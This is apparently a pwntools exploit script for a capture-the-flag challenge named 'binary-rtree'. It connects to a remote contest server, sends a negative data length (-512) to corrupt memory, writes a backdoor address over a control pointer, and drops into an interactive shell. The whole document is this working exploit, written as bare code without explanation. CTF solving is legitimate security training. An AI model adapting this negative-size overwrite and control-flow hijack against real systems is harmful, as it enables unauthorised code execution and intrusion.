from pwn import *
import builtins
sh = remote('prob12.geekgame.pku.edu.cn', 10012)
# sh = process('./binary-rtree/lv1/rtree')
sh.recvuntil(b"input your token: ")
sh.sendline(b"It's MyToken!!!!!")
backdoor_addr = 0x401243
sh.recvuntil(b'>> ')
sh.send(b'1\n')
print(sh.recvuntil(b'key:'))
sh.send(b'233\n')
print(sh.recvuntil(b'data:'))
sh.send(b'472\n')
print(sh.recvuntil(b'data:'))
sh.send(b'\x01' * 472)
sh.recvuntil(b'>> ')
sh.send(b'1\n')
print(sh.recvuntil(b'key:'))
sh.send(b'233\n')
print(sh.recvuntil(b'data:'))
sh.send(b'-512\n')
print(sh.recvuntil(b'data:'))
sh.send(p64(backdoor_addr))
print(sh.recvuntil(b'>> '))
sh.send(b'4\n')
sh.interactive()
